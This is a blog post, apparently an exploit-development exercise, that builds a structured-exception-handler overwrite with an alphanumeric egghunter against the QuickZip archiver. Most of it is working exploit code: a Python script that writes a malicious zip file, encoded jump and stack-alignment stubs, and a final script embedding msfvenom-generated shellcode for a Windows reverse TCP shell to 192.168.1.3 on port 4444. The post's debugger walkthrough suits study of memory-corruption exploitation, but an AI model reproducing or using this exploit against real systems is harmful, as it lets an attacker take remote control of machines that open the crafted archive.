{"id":19,"date":"2021-02-10T09:54:34","date_gmt":"2021-02-10T09:54:34","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=19"},"modified":"2021-02-10T09:55:05","modified_gmt":"2021-02-10T09:55:05","slug":"19","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/19\/","title":{"rendered":"SEH + Egghunter QuickZip Exploit"},"content":{"rendered":"\n

Initial Script<\/strong><\/h2>\n\n\n\n
#!\/usr\/bin\/python
header_1 = (“\\x50\\x4B\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00″”\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe4\\x0f\\x00\\x00\\x00”)
header_2 = (“\\x50\\x4B\\x01\\x02\\x14\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00″”\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe4\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00″”\\x24\\x00\\x00\\x00\\x00\\x00\\x00\\x00”)
header_3 = (“\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00″”\\x12\\x10\\x00\\x00\\x02\\x10\\x00\\x00\\x00\\x00”)
payload = “A” * 4064payload += “.txt”
exploit = header_1 + payload + header_2 + payload + header_3
myfile = open(‘kalisa.zip’,’w’);myfile.write(exploit);myfile.close()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Crash<\/h2>\n\n\n\n

Open the zip file, attach immunity, try to extract (where the crash happens)
<\/p>\n\n\n\n

Offset<\/h2>\n\n\n\n
\"?C812FD3<\/figure>\n\n\n\n

SEH Chain<\/h2>\n\n\n\n
\"Address<\/figure>\n\n\n\n

After Shift + F9<\/p>\n\n\n\n

\"004\u00d8D565<\/figure>\n\n\n\n

Seh chain again<\/p>\n\n\n\n

\"Address<\/figure>\n\n\n\n

Offset<\/p>\n\n\n\n

\"Address<\/figure>\n\n\n\n

EIP Control<\/h2>\n\n\n\n
\"Registers<\/figure>\n\n\n\n

POP-POP-RET<\/h2>\n\n\n\n
\"OBQDF\u00d8\u00d8D<\/figure>\n\n\n\n
offset = “A”*(298-4)nseh = “B”*4seh = “\\x33\\x28\\x42\\x00”      # pop pop ret 00422833junk = “A”* (4064-298-4)
payload = offset + nseh + seh + junkpayload += “.txt”<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Pass the exception to the application<\/p>\n\n\n\n

\"ntdll.<\/figure>\n\n\n\n

Shift + F7 for 3 times and we will move to nseh which is ‘\\x42’<\/p>\n\n\n\n

\"0012FBFC<\/figure>\n\n\n\n

Bad Characters<\/h2>\n\n\n\n

!mona bytearrayPython:for i in range(0,256): print(‘\\\\x%02X’ % i, end=”)Bash:for i in {0..255}; do printf “\\\\\\x%02x” $i;done<\/p>\n\n\n\n

offset = “A”*298nseh = “B”*4seh = “C”*4     bad = “\\x00…..\\xff”junk = “A”* (4064-298-4-4-len(bad))
payload = offset + nseh + seh + junkpayload += “.txt”<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

!mona bytearray!mona compare -f bytearray.bin -a [address where array begins]<\/p>\n\n\n\n

Mangled Characters<\/h2>\n\n\n\n
\\x80   C7\\x81   FC\\x82   E9\\x83   E2\\x84   E4\\x85   E0\\x86   E5\\x87   E7\\x88   EA\\x89   EB\\x8a   E8\\x8b   EF\\x8c   EE\\x8d   EC\\x8e   C4\\x8f   C5<\/td>\\x90   C9\\x91   E6\\x92   C6\\x93   F4\\x94   F6\\x95   F2\\x96   FB\\x97   F9\\x98   FF\\x99   D6\\x9a   DC\\x9b   A2\\x9c   A3\\x9d   A5\\x9e   50\\x9f   83<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\".<\/figure>\n\n\n\n

JMP BACK<\/h2>\n\n\n\n

\\9f is mangled to \\x83 which is -125When we use nseh = \\x71\\x9f\\x70\\x9f, before the JMP<\/p>\n\n\n\n

\"0012FBFC<\/figure>\n\n\n\n

After the JMP<\/p>\n\n\n\n

\"0012FB81<\/figure>\n\n\n\n

Address Difference: 0012FBFC – 0012FB81 = 7B (123 in decimal) Not 125 since we use 2 bytes with JNO
To make a checksum, divide offset as “A”*171 + “B”*123 and after JNO, we will jump into the beginning of B’s<\/p>\n\n\n\n

\"File<\/figure>\n\n\n\n

Let’s check if Junk is still in memoryclick m and search for DDDDDDDDDDDDDDD<\/p>\n\n\n\n

\"S<\/figure>\n\n\n\n

So we can still place our shellcode in memory<\/p>\n\n\n\n

Egghunter – Encrypted<\/h2>\n\n\n\n

!mona egghuntersave it in egghunter.txtcat egghunter.txt | tr -d ‘”‘ | tr -d ‘\\n’ | tr -d ‘\\\\x’ | xxd -r -p > egghunter.binmsfvenom -p generic\/custom PAYLOADFILE=egghunter.bin -e x86\/alpha_mixed BufferRegister=EDX -a x86 –platform Windows<\/p>\n\n\n\n

\"root.\u00dfkalisa.<\/figure>\n\n\n\n
encoded_egghunter= “JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA”
offset = “A”*27 + encoded_egghunter + “A”*27           # total of 171offset += “B”*123                         # total offset = 171 + 123 = 294 294nseh = “B”*4seh = “\\x33\\x28\\x42\\x00”      # pop pop ret 00422833junk = “D”* (4064-298-4)

payload = offset + nseh + seh + junkpayload += “.txt”<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

In the end, the payload will look like the following:”A”*n + egghunter + “JMP[egghunter]” + POPPOPRET + [Egg + Shellcode]
<\/p>\n\n\n\n

Get to the Egghunter Payload<\/h2>\n\n\n\n

Now we’ll use the remaining 123 bytes to get to our egghunter
Plan: Zero out EAXCalculate the value of the address of our shellcode, in little-endian orderPush the address in EAX onto the stackPop the value into EDXZero out EAX (not strictly necessary, but easier math)Push ESP onto the stackPop the value into EAXAdjust the stack address to point to an address below our decoder so that once we\u2019ve decoded it, we automatically execute itPush EAX onto the stackPop the value into ESP, making it so if we push a value, we\u2019ll be writing below our current executionPush JMP EDX instruction
Opcodes that we need – nasm_shellThe address of our shellcode in memoryPOP EDX opcode = \\x5APUSH ESP opcode = \\x54POP EAX opcode = \\x58PUSH EAX opcode = \\x50POP ESP opcode = \\x5CJMP EDX opcode = \\xFF\\xE2
nasm_shell.rb<\/p>\n\n\n\n

\"root.\u00dfkalisa.<\/figure>\n\n\n\n

The address of egghunter:
The beginning of our egghunter between “A”‘s is as below (0012FAF1). But it’s not divisible by 4 so we’ll start it one byte above with the following:”A”*26 + egghunter + “A”*28<\/p>\n\n\n\n

\"0012FQEQ<\/figure>\n\n\n\n

Now our egghunter starts at 0012FAF0<\/p>\n\n\n\n

\"0012PAEC<\/figure>\n\n\n\n

The address of our shellcode in memory = 0012FAF0POP EDX opcode = \\x5APUSH ESP opcode = \\x54POP EAX opcode = \\x58PUSH EAX opcode = \\x50POP ESP opcode = \\x5CJMP EDX opcode = \\xFF\\xE2
Zero out EAX (using AND EAX)
AND EAX = \\x25<\/p>\n\n\n\n

%JMNU : \\x25\\x4a\\x4d\\x4e\\x55 : AND EAX,0x554E4D4A %521* : \\x25\\x35\\x32\\x31\\x2a : AND EAX,0x2A313235
Binary of hex numbers:0x554E4D4A = 1010101010011100100110101001010 0x2A313235 = 0101010001100010011001000110101
XOR’ing them gives us 0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Encoding a Value:<\/h2>\n\n\n\n
Shellcode Address = 0012FAF0Little endian format: \\xF0\\xFA\\x12\\x00Compliment: \\x00\\x12\\xFA\\xF0
hexOfDecimal(4294967296-decimalOfHex(0012FAF0)) = FFED0510
decimalOfHex: 0012FAF0 = 12438884294967296 – 1243888 = 42937234084293723408 in hex is FFED0510<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Zero out EAX + PUSH EAX + POP EDX
!mona encode -t alphanum -s ‘\\xF0\\xFA\\x12\\x00’<\/p>\n\n\n\n

Results:——–  %JMNU : \\x25\\x4a\\x4d\\x4e\\x55 : AND EAX,0x554E4D4A  %521* : \\x25\\x35\\x32\\x31\\x2a : AND EAX,0x2A313235  -ZVNU : \\x2d\\x5a\\x56\\x4e\\x55 : SUB EAX,0x554e565a  -ZVNU : \\x2d\\x5a\\x56\\x4e\\x55 : SUB EAX,0x554e565a  -\\XPU : \\x2d\\x5c\\x58\\x50\\x55 : SUB EAX,0x5550585c  P : \\x50 : PUSH EAX
Full encoded string:——————–%JMNU%521*-ZVNU-ZVNU-\\XPUP
Full encoded hex:—————–\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x5a\\x56\\x4e\\x55\\x2d\\x5a\\x56\\x4e\\x55\\x2d\\x5c\\x58\\x50\\x55\\x50<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
# 27 bytesshellcode_to_edx = (  “\\x25\\x4a\\x4d\\x4e\\x55”        # AND EAX,0x554E4D4A  “\\x25\\x35\\x32\\x31\\x2a”        # AND EAX,0x2A313235  “\\x2d\\x5a\\x56\\x4e\\x55”        # SUB EAX,0x554e565a  “\\x2d\\x5a\\x56\\x4e\\x55”        # SUB EAX,0x554e565a  “\\x2d\\x5c\\x58\\x50\\x55”        # SUB EAX,0x5550585c  “\\x50”                                        # PUSH EAX  “\\x5A”                                       # POP EDX)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

So we use 27 bytes to get our shellcode location into EDX<\/p>\n\n\n\n

\"0012FB81<\/figure>\n\n\n\n

Decode Stack Alignment<\/h2>\n\n\n\n

The place to align the stack to and decode our JMP EDX to (need to be a multiple of four)sub eax = \\x2d<\/p>\n\n\n\n

\"0012FBF3<\/figure>\n\n\n\n

Place for it: 0012FBF8ESP: 0012F5C0
0012F5C0 (ESP) – 0012FBF8 (Target) = FFFFF9C8
FFFFF9C8\/3 = 5555534255 55 53 42 55 55 53 4255 55 53 44<\/p>\n\n\n\n

# 19 bytesdecode_stack_alignment = (    “\\x54”                 # PUSH ESP    “\\x58”                 # POP EAX    “\\x2d\\x42\\x53\\x55\\x55”  # SUB EAX, 0x55555342    “\\x2d\\x42\\x53\\x55\\x55”  # SUB EAX, 0x55555342    “\\x2d\\x44\\x53\\x55\\x55”  # SUB EAX, 0x55555344    “\\x50”                  # PUSH EAX    “\\x5c”                  # POP ESP)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

EAX is full of egghunter<\/p>\n\n\n\n

\"0012FB82<\/figure>\n\n\n\n

After POP EDX, now EDX is filled with egghunter<\/p>\n\n\n\n

\"0012FB82<\/figure>\n\n\n\n

After POP EAX, it doesn’t hold egghunter anymore<\/p>\n\n\n\n

\"0012FB82<\/figure>\n\n\n\n

After POP ESP, ESP holds the address 0012FBF8 which we want to go<\/p>\n\n\n\n

\"0012FB82<\/figure>\n\n\n\n

And our payload looks like following overall<\/p>\n\n\n\n

encoded_egghunter=”JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA”
offset = “A”*26 + encoded_egghunter + “A”*28           # total of 171offset += “B”*4 + shellcode_to_edx + decode_stack_alignmentoffset += “B”*(123-4-len(shellcode_to_edx)-len(decode_stack_alignment))                        nseh = “\\x71\\x9f\\x70\\x9f”seh = “\\x33\\x28\\x42\\x00”      # pop pop ret 00422833junk = “D”* (4064-298-4)
payload = offset + nseh + seh + junkpayload += “.txt”<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Encode JMP EDX<\/h2>\n\n\n\n

!mona encode -t alphanum -s ‘\\x90\\x90\\xFF\\xE2’<\/p>\n\n\n\n

Results:——–  %JMNU : \\x25\\x4a\\x4d\\x4e\\x55 : AND EAX,0x554E4D4A  %521* : \\x25\\x35\\x32\\x31\\x2a : AND EAX,0x2A313235  -%%U^ : \\x2d\\x25\\x25\\x55\\x5e : SUB EAX,0x5e552525  -%%U^ : \\x2d\\x25\\x25\\x55\\x5e : SUB EAX,0x5e552525  -&%V` : \\x2d\\x26\\x25\\x56\\x60 : SUB EAX,0x60562526  P : \\x50 : PUSH EAX
Full encoded string:——————–%JMNU%521*-%%U^-%%U^-&%V`P
Full encoded hex:—————–\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x25\\x25\\x55\\x5e\\x2d\\x25\\x25\\x55\\x5e\\x2d\\x26\\x25\\x56\\x60\\x50<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\"OBQDF\u00d8\u00d8D<\/figure>\n\n\n\n

Overall exploit:<\/h2>\n\n\n\n
encoded_egghunter=”JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA”
# 27 bytesshellcode_to_edx = (  “\\x25\\x4a\\x4d\\x4e\\x55”        # AND EAX,0x554E4D4A  “\\x25\\x35\\x32\\x31\\x2a”        # AND EAX,0x2A313235  “\\x2d\\x5a\\x56\\x4e\\x55”        # SUB EAX,0x554e565a  “\\x2d\\x5a\\x56\\x4e\\x55”        # SUB EAX,0x554e565a  “\\x2d\\x5c\\x58\\x50\\x55”        # SUB EAX,0x5550585c  “\\x50”                                        # PUSH EAX  “\\x5A”                                       # POP EDX)
# 19 bytesdecode_stack_alignment = (    “\\x54”                 # PUSH ESP    “\\x58”                 # POP EAX    “\\x2d\\x42\\x53\\x55\\x55”  # SUB EAX, 0x55555342    “\\x2d\\x42\\x53\\x55\\x55”  # SUB EAX, 0x55555342    “\\x2d\\x44\\x53\\x55\\x55”  # SUB EAX, 0x55555344    “\\x50”                  # PUSH EAX    “\\x5c”                  # POP ESP)
# 26 bytesencoded_jmp_edx = (  “\\x25\\x4a\\x4d\\x4e\\x55”  # AND EAX,0x554E4D4A  “\\x25\\x35\\x32\\x31\\x2a”  # AND EAX,0x2A313235  “\\x2d\\x25\\x25\\x55\\x5e”  # SUB EAX,0x5e552525  “\\x2d\\x25\\x25\\x55\\x5e”  # SUB EAX,0x5e552525  “\\x2d\\x26\\x25\\x56\\x60”  # SUB EAX,0x60562526  “\\x50”  # PUSH EAX)
# will be total of 294offset = “A”*26 + encoded_egghunter + “A”*28           # total of 171offset += “B”*4 + shellcode_to_edx + decode_stack_alignment + encoded_jmp_edxoffset += “C”*(123-4-len(shellcode_to_edx)-len(decode_stack_alignment)-len(encoded_jmp_edx))                        
nseh = “\\x71\\x9f\\x70\\x9f”seh = “\\x33\\x28\\x42\\x00”      # pop pop ret 00422833
junk = “D”* (4064-298-4)
payload = offset + nseh + seh + junkpayload += “.txt”<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Final Exploit and Shellcode<\/h2>\n\n\n\n

msfvenom -p windows\/shell_reverse_tcp LHOST=192.168.1.3 LPORT=4444 -e x86\/alpha_mixed -a x86 –platform windows -f python -v shellcode<\/p>\n\n\n\n

\"re<\/figure>\n\n\n\n
#!\/usr\/bin\/python
header_1 = (“\\x50\\x4B\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00″”\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe4\\x0f\\x00\\x00\\x00”)
header_2 = (“\\x50\\x4B\\x01\\x02\\x14\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00″”\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe4\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00″”\\x24\\x00\\x00\\x00\\x00\\x00\\x00\\x00”)
header_3 = (“\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00″”\\x12\\x10\\x00\\x00\\x02\\x10\\x00\\x00\\x00\\x00”)
# 710 bytesshellcode =  “w00tw00t”shellcode += “\\x89\\xe1\\xdb\\xda\\xd9\\x71\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49″shellcode += “\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51″shellcode += “\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32″shellcode += “\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41″shellcode += “\\x42\\x75\\x4a\\x49\\x4b\\x4c\\x4d\\x38\\x4f\\x72\\x57\\x70\\x35\\x50″shellcode += “\\x77\\x70\\x65\\x30\\x4f\\x79\\x69\\x75\\x64\\x71\\x6b\\x70\\x50\\x64″shellcode += “\\x4e\\x6b\\x36\\x30\\x30\\x30\\x4e\\x6b\\x70\\x52\\x34\\x4c\\x6c\\x4b”shellcode += “\\x72\\x72\\x76\\x74\\x6e\\x6b\\x62\\x52\\x37\\x58\\x44\\x4f\\x6d\\x67″shellcode += “\\x50\\x4a\\x66\\x46\\x75\\x61\\x4b\\x4f\\x6c\\x6c\\x77\\x4c\\x71\\x71″shellcode += “\\x31\\x6c\\x77\\x72\\x44\\x6c\\x57\\x50\\x6b\\x71\\x7a\\x6f\\x64\\x4d”shellcode += “\\x57\\x71\\x48\\x47\\x7a\\x42\\x4c\\x32\\x52\\x72\\x46\\x37\\x6e\\x6b”shellcode += “\\x43\\x62\\x34\\x50\\x4e\\x6b\\x32\\x6a\\x77\\x4c\\x4e\\x6b\\x32\\x6c”shellcode += “\\x67\\x61\\x31\\x68\\x48\\x63\\x53\\x78\\x37\\x71\\x6e\\x31\\x43\\x61″shellcode += “\\x6c\\x4b\\x53\\x69\\x35\\x70\\x66\\x61\\x4a\\x73\\x4e\\x6b\\x50\\x49″shellcode += “\\x37\\x68\\x7a\\x43\\x35\\x6a\\x47\\x39\\x4e\\x6b\\x46\\x54\\x6c\\x4b”shellcode += “\\x56\\x61\\x48\\x56\\x30\\x31\\x79\\x6f\\x6c\\x6c\\x79\\x51\\x38\\x4f”shellcode += “\\x74\\x4d\\x53\\x31\\x5a\\x67\\x70\\x38\\x79\\x70\\x71\\x65\\x39\\x66″shellcode += “\\x34\\x43\\x51\\x6d\\x4b\\x48\\x77\\x4b\\x51\\x6d\\x45\\x74\\x64\\x35″shellcode += “\\x59\\x74\\x70\\x58\\x4e\\x6b\\x53\\x68\\x75\\x74\\x36\\x61\\x68\\x53″shellcode += “\\x33\\x56\\x6e\\x6b\\x74\\x4c\\x30\\x4b\\x6e\\x6b\\x63\\x68\\x67\\x6c”shellcode += “\\x57\\x71\\x5a\\x73\\x4c\\x4b\\x34\\x44\\x6c\\x4b\\x53\\x31\\x58\\x50″shellcode += “\\x6e\\x69\\x63\\x74\\x66\\x44\\x44\\x64\\x63\\x6b\\x31\\x4b\\x61\\x71″shellcode += “\\x70\\x59\\x51\\x4a\\x56\\x31\\x39\\x6f\\x6d\\x30\\x51\\x4f\\x31\\x4f”shellcode += “\\x51\\x4a\\x6c\\x4b\\x32\\x32\\x7a\\x4b\\x6e\\x6d\\x73\\x6d\\x42\\x48″shellcode += “\\x30\\x33\\x67\\x42\\x53\\x30\\x75\\x50\\x55\\x38\\x31\\x67\\x32\\x53″shellcode += “\\x76\\x52\\x51\\x4f\\x73\\x64\\x73\\x58\\x52\\x6c\\x50\\x77\\x47\\x56″shellcode += “\\x53\\x37\\x4b\\x4f\\x4b\\x65\\x68\\x38\\x6e\\x70\\x36\\x61\\x73\\x30″shellcode += “\\x77\\x70\\x31\\x39\\x6a\\x64\\x43\\x64\\x50\\x50\\x33\\x58\\x76\\x49″shellcode += “\\x4b\\x30\\x72\\x4b\\x55\\x50\\x59\\x6f\\x48\\x55\\x76\\x30\\x36\\x30″shellcode += “\\x52\\x70\\x32\\x70\\x73\\x70\\x52\\x70\\x37\\x30\\x62\\x70\\x72\\x48″shellcode += “\\x78\\x6a\\x54\\x4f\\x59\\x4f\\x4b\\x50\\x4b\\x4f\\x69\\x45\\x4c\\x57″shellcode += “\\x31\\x7a\\x44\\x45\\x50\\x68\\x79\\x50\\x4d\\x78\\x67\\x71\\x32\\x31″shellcode += “\\x55\\x38\\x67\\x72\\x47\\x70\\x64\\x51\\x61\\x4c\\x6c\\x49\\x68\\x66″shellcode += “\\x30\\x6a\\x36\\x70\\x42\\x76\\x73\\x67\\x55\\x38\\x4c\\x59\\x6c\\x65″shellcode += “\\x51\\x64\\x53\\x51\\x79\\x6f\\x6b\\x65\\x4f\\x75\\x6b\\x70\\x50\\x74″shellcode += “\\x74\\x4c\\x69\\x6f\\x70\\x4e\\x56\\x68\\x74\\x35\\x68\\x6c\\x73\\x58″shellcode += “\\x38\\x70\\x78\\x35\\x59\\x32\\x30\\x56\\x6b\\x4f\\x4e\\x35\\x31\\x78″shellcode += “\\x63\\x53\\x50\\x6d\\x70\\x64\\x35\\x50\\x4f\\x79\\x7a\\x43\\x72\\x77″shellcode += “\\x71\\x47\\x42\\x77\\x70\\x31\\x78\\x76\\x33\\x5a\\x77\\x62\\x52\\x79″shellcode += “\\x31\\x46\\x49\\x72\\x39\\x6d\\x63\\x56\\x6f\\x37\\x47\\x34\\x37\\x54″shellcode += “\\x57\\x4c\\x57\\x71\\x45\\x51\\x6c\\x4d\\x31\\x54\\x46\\x44\\x64\\x50″shellcode += “\\x7a\\x66\\x73\\x30\\x33\\x74\\x66\\x34\\x32\\x70\\x62\\x76\\x66\\x36″shellcode += “\\x30\\x56\\x53\\x76\\x62\\x76\\x30\\x4e\\x42\\x76\\x63\\x66\\x71\\x43″shellcode += “\\x53\\x66\\x55\\x38\\x70\\x79\\x5a\\x6c\\x67\\x4f\\x6b\\x36\\x59\\x6f”shellcode += “\\x78\\x55\\x6b\\x39\\x39\\x70\\x30\\x4e\\x61\\x46\\x52\\x66\\x39\\x6f”shellcode += “\\x70\\x30\\x32\\x48\\x74\\x48\\x6d\\x57\\x65\\x4d\\x53\\x50\\x69\\x6f”shellcode += “\\x4b\\x65\\x4d\\x6b\\x4c\\x30\\x78\\x35\\x39\\x32\\x52\\x76\\x63\\x58″shellcode += “\\x4e\\x46\\x4f\\x65\\x6d\\x6d\\x6d\\x4d\\x6b\\x4f\\x38\\x55\\x45\\x6c”shellcode += “\\x57\\x76\\x53\\x4c\\x77\\x7a\\x6b\\x30\\x4b\\x4b\\x79\\x70\\x54\\x35″shellcode += “\\x67\\x75\\x4f\\x4b\\x50\\x47\\x74\\x53\\x30\\x72\\x62\\x4f\\x50\\x6a”shellcode += “\\x67\\x70\\x72\\x73\\x6b\\x4f\\x59\\x45\\x41\\x41”
# 117 bytes#egghunter = (“JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA”)
egghunter = (“JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FmQIZYoFoPB0Rpj321HhMfNUl4ERzbTzOOHPwp0FPCDLK8zlo3ExjloBUIwYom7AA”)
# 27 bytesshellcode_to_edx = (“\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x5a\\x56\\x4e\\x55\\x2d\\x5a\\x56\\x4e\\x55\\x2d\\x5c\\x58\\x50\\x55\\x50\\x5A”)
# 19 bytesdecode_stack_alignment = (“\\x54\\x58\\x2d\\x42\\x53\\x55\\x55\\x2d\\x42\\x53\\x55\\x55\\x2d\\x44\\x53\\x55\\x55\\x50\\x5c”)        
# 26 bytesencoded_jmp_edx = (“\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x25\\x25\\x55\\x5e\\x2d\\x25\\x25\\x55\\x5e\\x2d\\x26\\x25\\x56\\x60\\x50”)
# 171 – 117 = 54\/2 = 27offset = “A”*26 + egghunter + “A”*28offset += “B” * 4 + shellcode_to_edx + decode_stack_alignment + encoded_jmp_edxoffset += “C”*(123-4-len(shellcode_to_edx)-len(decode_stack_alignment)-len(encoded_jmp_edx))nseh = “\\x71\\x9f\\x70\\x9f” seh = “\\x33\\x28\\x42\\x00”     #00422833
junk = “D”* 4 + shellcode+ “D”* (4064-294-4-4-4-len(shellcode))payload = offset + nseh + seh + junkpayload += “.txt”
exploit = header_1 + payload + header_2 + payload + header_3
myfile = open(‘try.zip’,’w’);myfile.write(exploit);myfile.close()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Explanation<\/p>\n\n\n\n

|  Encoded shellcode  |  0012FAF0     |                     |       |                     |  |                     | |  A buffer start     |  0012FB63         |                     |       |                     |          |   jmp here (seh)    |  0012FB81        |                     |           |   shellcode_to_edx  |  0012FB85 (edx=12faf0 holds shellcode)      |                     |            |   stack align       |  0012FBA0 (esp = 12FBF8)        |                     |           |   jmp_edx           |  0012FBB3 (esp = 12FBF4)       |                     |           |                     |          |   B buffer start    |  0012FBCD        |                     |            |                     |           |                     |             |                     |       |                     |     |   JMP EDX           |  0012FBF6   (jump to 0012FAF0)     |                     |      |                     |               |   A buffer ends     |  0012FBFB        |   JMP back (nseh)   |  0012FBFC<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\"Encoded<\/figure>\n","protected":false},"excerpt":{"rendered":"

Initial Script #!\/usr\/bin\/pythonheader_1 = (“\\x50\\x4B\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00″”\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe4\\x0f\\x00\\x00\\x00”)header_2 = (“\\x50\\x4B\\x01\\x02\\x14\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00″”\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe4\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00″”\\x24\\x00\\x00\\x00\\x00\\x00\\x00\\x00”)header_3 = (“\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00″”\\x12\\x10\\x00\\x00\\x02\\x10\\x00\\x00\\x00\\x00”)payload = “A” * 4064payload += “.txt”exploit = header_1 + payload + header_2 + payload + header_3myfile = open(‘kalisa.zip’,’w’);myfile.write(exploit);myfile.close() Crash Open the zip file, attach immunity, try to extract (where the crash happens) Offset SEH Chain After Shift + F9 Seh chain again Offset EIP Control POP-POP-RET… Continue reading SEH + Egghunter QuickZip Exploit<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[18],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/19"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=19"}],"version-history":[{"count":2,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/19\/revisions"}],"predecessor-version":[{"id":21,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/19\/revisions\/21"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=19"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=19"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=19"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}